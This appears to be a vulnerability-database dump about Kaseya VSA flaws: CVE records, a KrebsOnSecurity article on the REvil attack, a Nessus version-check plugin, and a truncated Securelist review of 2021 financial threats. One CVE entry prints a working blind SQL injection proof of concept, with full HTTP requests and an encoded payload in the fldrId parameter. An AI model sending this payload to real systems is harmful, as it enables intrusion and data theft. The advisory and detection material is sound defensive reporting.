"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-30116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-02-09T14:18:26", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. 
Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30117", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-30116", "CVE-2021-30117"], "modified": "2022-04-29T18:59:00", "cpe": [], "id": "CVE-2021-30117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30117", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "krebs": [{"lastseen": "2021-07-28T14:33:34", "description": "\n\nLast week cybercriminals deployed ransomware to 1,500 organizations, including many that provide IT security and technical support to other companies. The attackers exploited a vulnerability in software from **Kaseya**, a Miami-based company whose products help system administrators manage large networks remotely. Now it appears Kaseya's customer service portal was left vulnerable until last week to a data-leaking security flaw that was first identified in the same software six years ago.\n\nOn July 3, the [REvil ransomware affiliate program](<https://krebsonsecurity.com/?s=revil>) began using a zero-day security hole ([CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>)) to deploy ransomware to hundreds of IT management companies running Kaseya's remote management software -- known as the **Kaseya Virtual System Administrator** (VSA).\n\nAccording to [this entry for CVE-2021-30116](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30116>), the security flaw that powers that Kaseya VSA zero-day was assigned a vulnerability number on April 2, 2021, indicating Kaseya [had roughly three months to address the bug before it was exploited in the wild](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>).\n\nAlso on July 3, security incident response firm **Mandiant** notified Kaseya that their billing and customer support site --**portal.kaseya.net** -- was vulnerable to [CVE-2015-2862](<https://nvd.nist.gov/vuln/detail/CVE-2015-2862>), a "directory traversal" vulnerability in Kaseya VSA that allows remote users to read any files on the server using nothing more than a Web browser.\n\nAs its name suggests, 
CVE-2015-2862 was issued in July 2015. Six years later, Kaseya's customer portal was still exposed to the data-leaking weakness.\n\n\n\nThe Kaseya customer support and billing portal. Image: Archive.org.\n\nMandiant notified Kaseya after hearing about it from **Alex Holden**, founder and chief technology officer of Milwaukee-based cyber intelligence firm [Hold Security](<https://www.holdsecurity.com>). Holden said the 2015 vulnerability was present on Kaseya's customer portal until Saturday afternoon, allowing him to download the site's ["web.config" file](<https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/webconfig-file-detected/>), a server component that often contains sensitive information such as usernames and passwords and the locations of key databases.\n\n"It's not like they forgot to patch something that Microsoft fixed years ago," Holden said. "It's a patch for their own software. And it's not zero-day. It's from 2015!"\n\nThe official description of CVE-2015-2862 says a would-be attacker would need to be already authenticated to the server for the exploit to work. But Holden said that was not the case with the vulnerability on the Kaseya portal that he reported via Mandiant.\n\n"This is worse because the CVE calls for an authenticated user," Holden said. "This was not."\n\n**Michael Sanders**, executive vice president of account management at Kaseya, confirmed that the customer portal was taken offline in response to a vulnerability report. 
Sanders said the portal had been retired in 2018 in favor of a more modern customer support and ticketing system, yet somehow the old site was still left available online.\n\n"It was deprecated but left up," Sanders said.\n\nIn a written statement shared with KrebsOnSecurity, Kaseya said that in 2015 CERT reported two vulnerabilities in its VSA product.\n\n"We worked with CERT on responsible disclosure and released patches for VSA versions V7, R8, R9 and R9 along with the public disclosure (CVEs) and notifications to our customers. Portal.kaseya.net was not considered by our team to be part of the VSA shipping product and was not part of the VSA product patch in 2015. It has no access to customer endpoints and has been shut down - and will no longer be enabled or used by Kaseya."\n\n"At this time, there is no evidence this portal was involved in the VSA product security incident," the statement continued. "We are continuing to do forensic analysis on the system and investigating what data is actually there."\n\nThe REvil ransomware group said affected organizations could negotiate independently with them for a decryption key, or someone could pay $70 million worth of virtual currency to buy a key that works to decrypt all systems compromised in this attack.\n\nBut Sanders said every ransomware expert Kaseya consulted so far has advised against negotiating for one ransom to unlock all victims.\n\n"The problem is that they don't have our data, they have our customers' data," Sanders said. "We've been counseled not to do that by every ransomware negotiating company we've dealt with. 
They said with the amount of individual machines hacked and ransomwared, it would be very difficult for all of these systems to be remediated at once."\n\nIn a video posted to YouTube on July 6, Kaseya CEO **Fred Voccola** said the ransomware attack had "limited impact, with only approximately 50 of the more than 35,000 Kaseya customers being breached."\n\n"While each and every customer impacted is one too many, the impact of this highly sophisticated attack has proven to be, thankfully, greatly overstated," Voccola said.\n\nThe zero-day vulnerability that led to Kaseya customers (and customers of those customers) getting ransomed was discovered and reported to Kaseya by [Wietse Boonstra](<https://twitter.com/wietsman>), a researcher with the **Dutch Institute for Vulnerability Disclosure** (DIVD). \n\nIn [a July 4 blog post](<https://csirt.divd.nl/2021/07/04/Kaseya-Case-Update-2/>), DIVD's **Victor Gevers** wrote that Kaseya was "very cooperative," and "asked the right questions."\n\n"Also, partial patches were shared with us to validate their effectiveness," Gevers wrote. "During the entire process, Kaseya has shown that they were willing to put in the maximum effort and initiative into this case both to get this issue fixed and their customers patched. They showed a genuine commitment to do the right thing. Unfortunately, we were beaten by REvil in the final sprint, as they could exploit the vulnerabilities before customers could even patch."\n\nStill, Kaseya has yet to issue an official patch for the flaw Boonstra reported in April. Kaseya [told customers on July 7](<https://venturebeat.com/2021/07/07/kaseya-patch-fixing-zero-day-attack-delayed-as-issues-hit-saas-rollout/>) that it was working "through the night" to push out an update.\n\nGevers said the Kaseya vulnerability was discovered as part of a larger DIVD effort to look for serious flaws in a wide array of remote network management tools. 
\n\n"We are focusing on these types of products because we spotted a trend where more and more of the products that are used to keep networks safe and secure are showing structural weaknesses," he wrote.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T15:22:58", "type": "krebs", "title": "Kaseya Left Customer Portal Vulnerable to 2015 Flaw in its Own Software", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2862", "CVE-2021-30116"], "modified": "2021-07-08T15:22:58", "id": "KREBS:6C9A4C86453CF1F4DA06688B3CC1E186", "href": "https://krebsonsecurity.com/2021/07/kaseya-left-customer-portal-vulnerable-to-2015-flaw-in-its-own-software/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:51:44", "description": "The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as referenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. 
(CVE-2021-30120)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T00:00:00", "type": "nessus", "title": "Kaseya VSA < 9.5.7a Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30119", "CVE-2021-30120"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:kaseya:virtual_system_administrator", "cpe:/a:kaseya:vsa"], "id": "KASEYA_9_5_7_2994.NASL", "href": "https://www.tenable.com/plugins/nessus/151494", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151494);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-30116\", \"CVE-2021-30119\", \"CVE-2021-30120\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0033\");\n\n 
script_name(english:\"Kaseya VSA < 9.5.7a Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Kaseya VSA instance installed on the remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Kaseya VSA installed on the remote host is affected by multiple vulnerabilities as \nreferenced in the vendor advisory:\n\n - Credentials leak and business logic flaw. (CVE-2021-30116)\n\n - Cross-Site Scripting vulnerability (XSS). (CVE-2021-30119)\n\n - 2FA Authentication bypass. (CVE-2021-30120)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.kaseya.com/potential-attack-on-kaseya-vsa/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to Kaseya VSA version 9.5.7a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-30116\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:kaseya:virtual_system_administrator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kaseya:vsa\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"kaseya_vsa_detect.nbin\");\n script_require_keys(\"installed_sw/Kaseya Virtual System Administrator\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\n var port = get_http_port(default:443);\n var app_info = vcf::get_app_info(app:'Kaseya Virtual System Administrator', port:port, webapp:TRUE);\n\nvar constraints = [\n { 'min_version' : '0.0', 'fixed_version' : '9.5.7.2994'}\n];\n\nvcf::kaseya_vsa::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-11-25T08:40:17", "description": "\n\nFirst of all, we are going to analyze [the forecasts we made](<https://securelist.com/cyberthreats-to-financial-organizations-in-2021/99591/>) at the end of 2020 and see how accurate they were. Then we will go through the key events of 2021 relating to attacks on financial organizations. Finally, we will make some forecasts about financial attacks in 2022.\n\n## Analysis of forecasts for 2021\n\n * _The COVID-19 pandemic is likely to cause a massive wave of poverty, and that invariably translates into more people resorting to crime, including cybercrime. We might see certain economies crashing and local currencies plummeting, which would make Bitcoin theft a lot more attractive. 
We should expect more fraud, [targeting mostly BTC](<https://securelist.com/ghimob-tetrade-threat-mobile-devices/99228/>), because this cryptocurrency is the most popular._\n\n**Yes.** Data from the [Brazilian Federation of Banks](<https://noomis.febraban.org.br/videos/brasileiros-temem-fraudes-e-veem-alta-nas-violacoes-de-dados-indica-estudo>) registered a considerable increase in crime (such as explosions at bank branches to steal money) and cybercrime (increased phishing and social-engineering attacks) against banking customers and banking infrastructure. Of course, this is the result of economic problems caused by the pandemic.\n\nIn addition, bitcoin ended 2020 at around $28,000 and quickly rose to a peak of $40,000 in January 2021. With bitcoin currently valued at approximately $60,000, cybercriminals have adapted their malware to monitor the operating system's clipboard and redirect funds to addresses under their control. In fact, from January through the end of October, Kaspersky detected more than 2,300 fraudulent global resources aimed at 85,000 potential crypto investors or users who are interested in cryptocurrency mining. The lockdown's effect on the global economy is leading emerging markets and different regions to adopt cryptocurrency as legal tender or at least as a way of storing value during these times.\n\n * _MageCart attacks moving to the server side. We can see that the number of threat actors that rely on client-side attacks (JavaScript) is diminishing by the day. It is reasonable to believe that there will be a shift to the server side._\n\n**Yes.** Magecart Group 12, known for skimming payment information from online shoppers, now uses PHP web shells to gain remote administrative access to the sites under attack and steal credit card data, rather than using its previously favored JavaScript code. 
A file that attempts to pass itself off as 'image/png' but does not have the proper .PNG format loads a PHP web shell on compromised sites by replacing the legitimate shortcut icon tags with a path to the fake .PNG file. The web shell is harder to detect and block because [it injects the skimmer code on the server side rather than the client side](<https://threatpost.com/magecart-server-side-itactics-changeup/166242/>).\n\n * _A re-integration and internalization of operations inside the cybercrime ecosystem: the major players on the cybercrime market and those who made enough profit will mostly rely on their own in-house development, reducing outsourcing to boost their profits._\n\n**Yes.** Lots of groups recruited numerous affiliates, but this approach comes with the potential problems of human error and leaks. To boost their profits and depend less on outsourcing, some groups such as REvil even [scammed their affiliates](<https://www.bankinfosecurity.com/blogs/revil-ransomware-groups-latest-victim-its-own-affiliates-p-3125>), adding a backdoor capable of hijacking negotiations with victims and taking the 70% of the ransom payments that is supposed to go to the affiliates.\n\nThe Conti gang also had issues with its associates when an apparently vengeful affiliate [leaked the ransomware group's playbook](<https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/>) after claiming the notorious cybercriminal organization underpaid him for doing its dirty work. The data revealed in the post included the IP addresses for the group's Cobalt Strike command-and-control servers (C2s) and a 113MB archive containing numerous tools and training materials explaining how Conti performs ransomware attacks.\n\n * _Advanced threat actors from countries placed under economic sanctions may rely more on ransomware imitating cybercriminal activity. 
They may reuse publicly available code or create their own campaigns from scratch._\n\n**Yes.** In April 2021, the Andariel group attempted to spread custom ransomware. According to the Korean Financial Security Institute, Andariel is a [sub-group of the Lazarus](<https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1138.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=>) threat actor. Interestingly, one victim was found to have received ransomware after the third-stage payload. This [ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) sample is custom made and developed explicitly by the threat actor behind this attack. This ransomware is controlled by command line parameters and can retrieve an encryption key either from the C2 or from an argument at launch time.\n\n * _As ransomware groups continue to maximize profits, we should expect to see the use of 0-day exploits as well as N-day exploits in upcoming attacks. These groups will purchase both to expand the scale of their attacks even further, boosting their success rate, and resulting in more profit._\n\n**Definitely yes.** We saw many attacks using N-days, such as the attack that targeted the [Brazilian Supreme Court](<https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/>) (exploiting vulnerabilities in VMware ESXi, CVE-2019-5544 and CVE-2020-3992). Also, many groups relied on vulnerabilities in VPN servers. Threat actors conducted a series of attacks using the Cring ransomware. An incident investigation [conducted](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) by Kaspersky ICS CERT at one of the attacked enterprises revealed that they exploited a vulnerability in FortiGate VPN servers (CVE-2018-13379).\n\nWe also saw attackers relying on 0-days. 
Probably the most impactful was the Kaseya compromise, using supply-chain vulnerabilities to distribute ransomware (CVE-2021-30116). Another impressive attack, also relying on supply-chain compromise, [was against BQE Software](<https://www.bleepingcomputer.com/news/security/hackers-used-billing-software-zero-day-to-deploy-ransomware/>), the company behind billing software BillQuick, which claims to have a 400,000 strong user base worldwide. An unknown ransomware group exploited a critical SQL injection bug found in the BillQuick Web Suite time and billing solution to deploy ransomware on their targets' networks in ongoing attacks (CVE-2021-42258). \nAs these groups have deep pockets with all the money they have received from numerous attacks, we can expect more attacks exploiting N-days and 0-days to deliver ransomware to lots of targets.\n\n * _Cracking down hard on the cybercrime world. In 2020, OFAC [announced](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20201001>) that they would supervise any payment to ransomware groups. Then US Cyber Command [took down Trickbot](<https://www.cyberscoop.com/trickbot-takedown-cyber-command-microsoft/>) temporarily ahead of the elections. There should be an expansion of the "[persistent engagement](<https://www.npr.org/2019/08/26/747248636/persistent-engagement-the-phrase-driving-a-more-assertive-u-s-spy-agency?t=1604481013627>)" strategy to financial crime. 
There is also a possibility of economic sanctions against institutions, territories or even countries that show a lack of resolve to combat cybercrime that originates on their territory._\n\n**Yes.** With continued opposition to ransomware payments, OFAC made clear its view that making ransomware payments encourages future ransomware attacks and, if such payments (and related services and facilitation) violate US sanctions prohibitions, may expose payment participants to [OFAC sanctions enforcement](<https://www.insideprivacy.com/data-security/ofac-issues-updated-guidance-on-ransomware-payments/>). And while "the FBI understands that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers," the Updated Advisory strongly discourages all private companies and citizens from paying the ransom or extortion demands and recommends focusing on strengthening defensive and resilience measures to prevent and protect against ransomware attacks.\n\nThe [Updated Advisory on Potential Sanctions Risks for Facilitating Ransomware Payments](<https://home.treasury.gov/system/files/126/ofac_ransomware_advisory.pdf>) describes the potential sanctions risks associated with making and facilitating ransomware payments and provides information for contacting relevant US government \nagencies, including OFAC, if there is any reason to suspect the cyber actor demanding ransomware payment may be sanctioned or otherwise have a sanctions nexus.\n\nIn addition, a new proposed law compels US businesses to disclose any ransomware payments within 48 hours of the transaction. 
[The Ransom Disclosure Act](<https://www.warren.senate.gov/newsroom/press-releases/warren-and-ross-introduce-bill-to-require-disclosures-of-ransomware-payments>) will:\n\n * Require ransomware victims (excluding individuals) to disclose information about ransom payments no later than 48 hours after the date of payment, including the amount of ransom demanded and paid, the type of currency used for payment of the ransom, and any known information about the entity demanding the ransom;\n * Require DHS to make public the information disclosed during the previous year, excluding identifying information about the entities that paid ransoms;\n * Require DHS to establish a website through which individuals can voluntarily report payment of ransoms;\n * Direct the Secretary of Homeland Security to conduct a study on commonalities among ransomware attacks and the extent to which cryptocurrency facilitated these attacks and provide recommendations for protecting information systems and strengthening cybersecurity.\n\nThe US Department of the Treasury recently sanctioned two virtual currency exchanges, which helped ransomware threat actors to process victims' payments. Back in September 2021, [SUEX](<https://home.treasury.gov/news/press-releases/jy0364>) got sanctioned and accused of money laundering. In November 2021, [Chatex](<https://home.treasury.gov/news/press-releases/jy0471>), which is directly connected to SUEX, also got sanctioned with similar charges, according to public information.\n\n * _With the special technical capabilities of monitoring, deanonymization and [seizing](<https://www.bbc.com/news/amp/technology-54833130>) of BTC accounts now in place, we should expect cybercriminals to switch to transit cryptocurrencies for charging victims. 
There is reason to believe they might switch to other privacy-enhanced currencies, such as Monero, to use these first as a transition currency and then convert the funds to any other cryptocurrency of choice including BTC._\n\n**No.** While the Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside>) $2.3 million in cryptocurrency paid to the ransomware extortionists Darkside, other privacy and anonymity-focused cryptocurrencies such as Monero, Dash or Zcash still aren't the default choice used by cybercriminal groups. With more regulatory pressure aimed at exchanges, threat actors attempting to cash out ransomware bounties obtained through anonymous coins could face more difficulties than those that rely on Bitcoin or Ethereum for their illegal businesses. Even if the payments are traceable, different coin-mixing and coin-laundering underground services facilitate re-entering funds into the legitimate exchange ecosystem. Monero, among other similar cryptocurrencies, has been delisted from popular exchanges. Using it for trading or simply swapping is not as easy as it used to be.\n\n * _Extortion on the rise. One way or another, cybercriminals targeting financial assets will rely on extortion. If not ransomware, then DDoS or possibly both. This could be especially critical to companies that lose data, go through an exhausting data recovery process and then have their online operations knocked out._\n\n**Yes.** 2021 saw the appearance of two new botnets. News broke in January of the FreakOut malware that attacks Linux devices. Cybercriminals exploited several critical vulnerabilities in programs installed on victim devices, including the newly discovered CVE-2021-3007. 
Botnet operators use infected devices to carry out DDoS attacks or mine cryptocurrency.\n\nCybercriminals also found a host of new tools for amplifying DDoS attacks.\n\nThe most significant event in Q1 was the COVID-19 vaccination program. As new segments of the population became eligible for vaccination, related websites [suffered interruptions](<https://securelist.com/ddos-attacks-in-q1-2021/102166/>). For example, at the end of January, a vaccine registration website in the US state of Minnesota crashed under the load.\n\nWe have seen how some groups like Egregor (arrested) extorted via massive LAN printing. Other groups rely on telephone calls, leaving voice messages and threatening employees and their families.\n\n## Key events in 2021\n\n * **Ransomware threat actor arrests**\n\nWith ransomware attacks going wild and stealing the headlines this year, law enforcement all around the world intensified their fight against ransomware groups. In 2021, we saw Egregor, one of the noisiest ransomware families, reborn from Sekhmet and previously from Maze, [get busted](<https://www.zdnet.com/article/egregor-ransomware-operators-arrested-in-ukraine/>). Another case in point is REvil, aka Sodinokibi, that came from GandCrab, which came from Cerber. In November, some of their affiliates [were arrested](<https://www.interpol.int/en/News-and-Events/News/2021/Joint-global-ransomware-operation-sees-arrests-and-criminal-network-dismantled>) as well. The arrest of [Yaroslav Vasinskyi](<https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya>) and the charges against Yevgeniy Polyanin are excellent examples of effective international cooperation in the cybercrime fight. 
\n\n * **Facebook incidents (a data breach in April and a data leak in October)**\n\nBecause of Facebook's rebrand and new mission announced by its CEO, the company's [data leaks](<https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/>) may represent a severe risk to their customers. Some companies have gone entirely virtual, and an account takeover could cause severe harm to their business or sales. \nWe also learned that Meta's goal is to consolidate people's lives, connecting them in all aspects of life, including financially. This concerns, for instance, money transfers and, potentially, other financial activities. With customers' plain text information disclosed by leaks on the internet, cybercriminals have gained new attack possibilities. \n\n * **Android Trojan bankers on the rise**\n\nThis year, we saw more Android Trojan bankers targeting users worldwide with a special focus on Europe, Latin America and the Middle East. In 2021, we have witnessed several families, such as RealRAT, Coper, Bian, SMisor, [Ubel](<https://twitter.com/dimitribest/status/1440737695571996673?s=20>), [TwMobo](<https://www.kaspersky.com.br/blog/hackers-brasileiros-exportam-virus-mobile-banking-twmobo/18026/>), [BRata](<https://securelist.com/spying-android-rat-from-brazil-brata/92775/>), and [BasBanke](<https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/>) actively targeting mobile users. Some of those campaigns are accompanied by social engineering where the threat actor calls the victim and sends a specially crafted text message with a download link leading to a malicious APK file after a short conversation.\n\n## Forecasts for 2022\n\n * **Rise and consolidation of information stealers**\n\nOur telemetry shows an exponential growth in infostealers in 2021. Given the variety of offers, low costs, and effectiveness, we believe this trend will continue. 
Additionally, it might even be used as a bulk collector for targeted and more complex attacks.\n\n * **Cryptocurrency targeted attack**\n\nThe cryptocurrency business continues to grow, and people continue to invest their money in this market because it's a digital asset and all transactions occur online. It also offers anonymity to users. These are attractive aspects that cybercrime groups will be unable to resist. \nAnd not only cybercrime groups but also state-sponsored groups who have already started targeting this industry. After the Bangladesh bank heist, the BlueNoroff group is still aggressively attacking the cryptocurrency business, and we anticipate this activity will continue.\n\n * **More cryptocurrency-related threats: fake hardware wallets, smart contract attacks, DeFi hacks and more**\n\nWhile in some regions cryptocurrency [has been banned](<https://www.nytimes.com/2021/09/24/business/china-cryptocurrency-bitcoin.html>), it has received official recognition and acceptance in others. And it's not just about El Salvador. For example, the Mayor of Miami [declared](<https://markets.businessinsider.com/news/currencies/miami-bitcoin-yield-miamicoin-crypto-francis-suarez-mayor-digital-wallet-2021-11?op=1>) that the City plans to start paying residents who use cryptocurrency, and he [stated on Twitter](<https://twitter.com/FrancisSuarez/status/1455562833006059528?s=20>) that he would receive his salary 100% in bitcoin. \nWhile some people consider it risky to invest in cryptocurrencies, those who do realize that their wallet is the weakest link. While most infostealers can easily steal a locally stored wallet, a [cloud-based one](<https://www.ledger.com/addressing-the-july-2020-e-commerce-and-marketing-data-breach>) is also susceptible to attacks with the risk of losing funds. Then there are hardware-based cryptocurrencies wallets. But the question is, are there sufficiently reliable and transparent security assessments to prove that 